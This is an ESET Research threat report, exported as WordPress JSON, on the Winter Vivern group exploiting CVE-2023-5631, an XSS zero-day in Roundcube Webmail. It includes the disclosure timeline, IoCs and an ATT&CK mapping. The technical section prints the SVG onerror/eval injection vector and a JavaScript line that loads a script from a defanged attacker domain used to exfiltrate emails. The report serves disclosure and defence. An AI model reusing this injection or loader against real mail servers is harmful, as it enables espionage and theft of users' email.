{"id":8485,"date":"2023-10-25T12:00:00","date_gmt":"2023-10-25T09:00:00","guid":{"rendered":"https:\/\/blog.eset.ee\/et\/2023\/10\/25\/winter-vivern-exploits-zero-day-vulnerability-in-roundcube-webmail-servers\/"},"modified":"2023-10-25T12:00:00","modified_gmt":"2023-10-25T09:00:00","slug":"winter-vivern-exploits-zero-day-vulnerability-in-roundcube-webmail-servers","status":"publish","type":"post","link":"https:\/\/blog.eset.ee\/et\/en\/2023\/10\/25\/winter-vivern-exploits-zero-day-vulnerability-in-roundcube-webmail-servers\/","title":{"rendered":"Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers"},"content":{"rendered":"<p>ESET Research has been closely tracking the cyberespionage operations of Winter Vivern for more than a year and, during our routine monitoring, we found that the group began exploiting a zero-day <a href=\"https:\/\/owasp.org\/www-community\/attacks\/xss\/\">XSS <\/a>vulnerability in the Roundcube Webmail server on October 11<sup>th<\/sup>, 2023. This is a different vulnerability than <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-35730\">CVE-2020-35730<\/a>, which was also exploited by the group according to our research.<\/p>\n<p>According to ESET telemetry data, the campaign targeted Roundcube Webmail servers belonging to governmental entities and a think tank, all in Europe.<\/p>\n<blockquote>\n<div><strong>Vulnerability disclosure timeline:<\/strong><\/div>\n<ul>\n<li><strong>2023-10-12<\/strong>: ESET Research reported the vulnerability to the Roundcube team.<\/li>\n<li><strong>2023-10-14<\/strong>: The Roundcube team responded and acknowledged the vulnerability.<\/li>\n<li><strong>2023-10-14<\/strong>: The Roundcube team patched the vulnerability.<\/li>\n<li><strong>2023-10-16<\/strong>: The Roundcube team released security updates to address the vulnerability (1.6.4, 1.5.5, and 1.4.15).<\/li>\n<li><strong>2023-10-18<\/strong>: ESET CNA issues a CVE for the vulnerability (<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-5631\">CVE-2023-5631<\/a>).<\/li>\n<li><strong>2023-10-25<\/strong>: ESET Research blogpost published.<\/li>\n<\/ul>\n<\/blockquote>\n<p>We would like to thank the Roundcube developers for their quick reply and for patching the vulnerability in such a short time frame.<\/p>\n<h2><a><\/a>Winter Vivern profile<\/h2>\n<p>Winter Vivern is a cyberespionage group first revealed by <a href=\"https:\/\/www.domaintools.com\/resources\/blog\/winter-vivern-a-look-at-re-crafted-government-maldocs\/\">DomainTools<\/a> in 2021. It is thought to have been active since at least 2020 and it targets governments in Europe and Central Asia. To compromise its targets, the group uses malicious documents, phishing websites, and a custom PowerShell backdoor (see the articles from the <a href=\"https:\/\/scpc.gov.ua\/api\/docs\/4eeb6a10-b7aa-4396-8b04-e0e4b7fca1lj\/4eeb6a10-b7aa-4396-8b04-e0e4b7fca1lj.pdf\">State Cyber Protection Centre of Ukraine<\/a> and from <a href=\"https:\/\/www.sentinelone.com\/labs\/winter-vivern-uncovering-a-wave-of-global-espionage\/\">SentinelLabs<\/a>). We believe with low confidence that Winter Vivern is linked to <a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus\/\">MoustachedBouncer<\/a>, a sophisticated Belarus-aligned group that we first published about in August, 2023.<\/p>\n<p>Winter Vivern has been targeting Zimbra and Roundcube email servers belonging to governmental entities since at least 2022 \u2013 see this article from <a href=\"https:\/\/www.proofpoint.com\/uk\/blog\/threat-insight\/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability\">Proofpoint<\/a>. In particular, we observed that the group exploited <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-35730\">CVE-2020-35730<\/a>, another XSS vulnerability in Roundcube, in August and September 2023. Note that <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/white-papers\/eset-sednit-full.pdf\">Sednit<\/a> (also known as APT28) is exploiting this old XSS vulnerability in Roundcube as well, sometimes against the same targets.<\/p>\n<h2><a><\/a>Technical details<\/h2>\n<p>Exploitation of the XSS vulnerability, assigned <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-5631\">CVE-2023-5631<\/a>, can be done remotely by sending a specially crafted email message. In this Winter Vivern campaign, the emails were sent from <span>team.managment@outlook[.]com<\/span> and had the subject <span>Get started in your Outlook<\/span>, as shown in <span lang=\"EN-US\"><span><span>Figure 1.<\/span><\/span><\/span><\/p>\n<figure><img decoding=\"async\" alt=\"Figure-1-wintervivern-email\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-10\/winter-wivern\/figure-1-wintervivern-email.jpeg\" title=\"Figure 1. Malicious email message\" width=\"\"><figcaption><em>Figure 1. Malicious email message<\/em><\/figcaption><\/figure>\n<p>At first sight, the email doesn\u2019t seem malicious \u2013 but if we examine the HTML source code, shown in<span lang=\"EN-US\"><span><br \/>\n<span>Figure 2<span>, we can see an SVG tag at the end, which contains a base64-encoded payload.<\/span><\/span><\/span><\/span><\/p>\n<figure><img decoding=\"async\" alt=\"Figure-2-winter-vivern-email-message\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-10\/winter-wivern\/figure-2-winter-vivern-email-message-1.png\" title=\"Figure 2. Email message with a malicious SVG tag\" width=\"\"><figcaption><em>Figure 2. Email message with a malicious SVG tag<\/em><\/figcaption><\/figure>\n<p>Once we decode the base64-encoded value in the <span>href<\/span> attribute of the <span>use<\/span> tag, we have:<\/p>\n<p><span>&lt;svg id=&#8221;x&#8221; xmlns=&#8221;http:\/\/www.w3.org\/2000\/svg&#8221;&gt; &lt;image href=&#8221;x&#8221; onerror=&#8221;eval(atob(&#8216;&lt;base64-encoded payload&gt;&#8217;))&#8221; \/&gt;&lt;\/svg&gt;<\/span><\/p>\n<p>As the <span>x<\/span> value argument of the <span>href <\/span>attribute is not a valid URL, this object\u2019s <span>onerror<\/span> attribute will be activated. Decoding the payload in the <span>onerror<\/span> attribute gives us the following JavaScript code (with the malicious URL manually defanged), which will be executed in the browser of the victim in the context of their Roundcube session:<\/p>\n<p><span>var fe=document.createElement(&#8216;script&#8217;);fe.src=&#8221;https:\/\/recsecas[.]com\/controlserver\/checkupdate.js&#8221;;document.body.appendChild(fe);<\/span><\/p>\n<p>Surprisingly, we noticed that the JavaScript injection worked on a fully patched Roundcube instance. It turned out that this was a zero-day XSS vulnerability affecting the server-side script <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/blob\/7b2df52ede57bab9e87e9c3bc00601eeca591a5e\/program\/lib\/Roundcube\/rcube_washtml.php\">rcube_washtml.php<\/a>, which doesn\u2019t properly sanitize the malicious SVG document before being added to the HTML page interpreted by a Roundcube user. We reported it to Roundcube and it was <a href=\"https:\/\/roundcube.net\/news\/2023\/10\/16\/security-update-1.6.4-released\">patched<\/a> on October 14<sup>th<\/sup>, 2023 (see this <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/commit\/6ee6e7ae3\">commit<\/a>). The vulnerability affects Roundcube <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/releases\">versions<\/a> 1.6.x before 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15.<\/p>\n<p>In summary, by sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user\u2019s browser window. No manual interaction other than viewing the message in a web browser is required.<\/p>\n<p>The second stage is a simple JavaScript loader named <span>checkupdate.js<\/span> and is shown in <span><span><span>Figure 3<span lang=\"EN-CA\">.<\/span><\/span><\/span><\/span><\/p>\n<figure><img decoding=\"async\" alt=\"Figure-3-javascript-loader\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-10\/winter-wivern\/figure-3-javascript-loader-1-2.png\" title=\"Figure 3. JavaScript loader\" width=\"\"><figcaption><em>Figure 3. JavaScript loader<\/em><\/figcaption><\/figure>\n<p>The final JavaScript payload \u2013 shown in <span lang=\"EN-US\"><span><span>Figure 4 <span>\u2013 is able to list folders and emails in the current Roundcube account, and to exfiltrate email messages to the C&amp;C server by making HTTP requests to <span>https:\/\/recsecas[.]com\/controlserver\/saveMessage<\/span>.<\/span><\/span><\/span><\/span><\/p>\n<figure><img decoding=\"async\" alt=\"Figure-4-final-payload\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-10\/winter-wivern\/figure-4-final-payload-1-2.png\" title=\"Figure 4. Final JavaScript payload exfiltrating email messages from the Roundcube account (part of the obfuscated script removed for clarity)\" width=\"\"><figcaption><em>Figure 4. Final JavaScript payload exfiltrating email messages from the Roundcube account (part of the obfuscated script removed for clarity)<\/em><\/figcaption><\/figure>\n<h2><a><\/a>Conclusion<\/h2>\n<p>Winter Vivern has stepped up its operations by using a zero-day vulnerability in Roundcube. Previously, it was using known vulnerabilities in Roundcube and Zimbra, for which proofs of concept are available online.<\/p>\n<p>Despite the low sophistication of the group\u2019s toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and because a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities.<\/p>\n<blockquote>\n<p>For any inquiries about our research published on WeLiveSecurity, please contact us at <a href=\"mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>.<br \/>ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers\">ESET Threat Intelligence<\/a> page.<\/p>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<h3>Files<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<thead>\n<tr>\n<td>\n<p><strong>SHA-1<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>Filename<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>Detection<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>Description<\/strong><\/p>\n<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>\n<p><span>97ED594EF2B5755F0549C6C5758377C0B87CFAE0<\/span><\/p>\n<\/td>\n<td>\n<p><span>checkupdate.js<\/span><\/p>\n<\/td>\n<td>\n<p>JS\/WinterVivern.B<\/p>\n<\/td>\n<td>\n<p>JavaScript loader.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p><span>8BF7FCC70F6CE032217D9210EF30314DDD6B8135<\/span><\/p>\n<\/td>\n<td>\n<p>N\/A<\/p>\n<\/td>\n<td>\n<p>JS\/Kryptik.BIK<\/p>\n<\/td>\n<td>\n<p>JavaScript payload exfiltrating emails in Roundcube.<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Network<\/h2>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<thead>\n<tr>\n<td>\n<p><strong>IP<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>Domain<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>Hosting provider<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>First seen<\/strong><\/p>\n<\/td>\n<td>\n<p><strong>Details<\/strong><\/p>\n<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>\n<p><span>38.180.76[.]31<\/span><\/p>\n<\/td>\n<td>\n<p><span>recsecas[.]com<\/span><\/p>\n<\/td>\n<td>\n<p>M247 Europe SRL<\/p>\n<\/td>\n<td>\n<p>2023-09-28<\/p>\n<\/td>\n<td>\n<p>Winter Vivern C&amp;C server<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Email addresses<\/h2>\n<p><span>team.managment@outlook[.]com<\/span><\/p>\n<h1>MITRE ATT&amp;CK techniques<\/h1>\n<p>This table was built using <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">version 13<\/a> of the MITRE ATT&amp;CK framework.<\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"113\">\n<p><strong>Tactic<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><strong>ID<\/strong><\/p>\n<\/td>\n<td width=\"151\">\n<p><strong>Name<\/strong><\/p>\n<\/td>\n<td width=\"265\">\n<p><strong>Description<\/strong><\/p>\n<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td rowspan=\"3\" width=\"113\">\n<p><strong>Resource Development<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1583\/001\">T1583.001<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Acquire Infrastructure: Domains<\/p>\n<\/td>\n<td width=\"265\">\n<p>Winter Vivern operators bought a domain at Registrar.eu.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1583\/004\">T1583.004<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Acquire Infrastructure: Server<\/p>\n<\/td>\n<td width=\"265\">\n<p>Winter Vivern operators rented a server at M247.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1587\/004\">T1587.004<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Develop Capabilities: Exploits<\/p>\n<\/td>\n<td width=\"265\">\n<p>Winter Vivern operators probably developed an exploit for Roundcube.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\" width=\"113\">\n<p><strong>Initial Access<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1190\">T1190<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Exploit Public-Facing Application<\/p>\n<\/td>\n<td width=\"265\">\n<p>Winter Vivern sent an email exploiting CVE\u20112023-5631 in Roundcube.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1566\">T1566<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Phishing<\/p>\n<\/td>\n<td width=\"265\">\n<p>The vulnerability is triggered via a phishing email, which should be opened in the Roundcube webmail by the victim.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong>Execution<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1203\">T1203<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Exploitation for Client Execution<\/p>\n<\/td>\n<td width=\"265\">\n<p>The JavaScript payload is executed by an XSS vulnerability in Roundcube.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong>Discovery<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1087\/003\">T1087.003<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Account Discovery: Email Account<\/p>\n<\/td>\n<td width=\"265\">\n<p>The JavaScript payload can list folders in the email account.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong>Collection<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1114\/002\">T1114.002<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Email Collection: Remote Email Collection<\/p>\n<\/td>\n<td width=\"265\">\n<p>The JavaScript payload can exfiltrate emails from the Roundcube account.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong>Command and Control<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1071\/001\">T1071.001<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Application Layer Protocol: Web Protocols<\/p>\n<\/td>\n<td width=\"265\">\n<p>C&amp;C communications use HTTPs.<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong>Exfiltration<\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1041\">T1041<\/a><\/p>\n<\/td>\n<td width=\"151\">\n<p>Exfiltration Over C2 Channel<\/p>\n<\/td>\n<td width=\"265\">\n<p>Exfiltration is done via HTTPs and to the same C&amp;C server.<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers\"><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"296\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2022\/12\/eset-threat-intelligence.png\" width=\"915\"><\/a><\/p>\n<p class=\"wls-source\"><a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers\/\" rel=\"nofollow noopener\" target=\"_blank\">Read the full analysis on WeLiveSecurity \u2192<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>ESET Research recommends updating Roundcube Webmail to the latest available version as soon as possible<\/p>\n","protected":false},"author":5,"featured_media":8486,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2878],"tags":[],"class_list":["post-8485","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-eset-research"],"acf":[],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/8485","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/comments?post=8485"}],"version-history":[{"count":0,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/8485\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media\/8486"}],"wp:attachment":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media?parent=8485"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/categories?post=8485"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/tags?post=8485"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}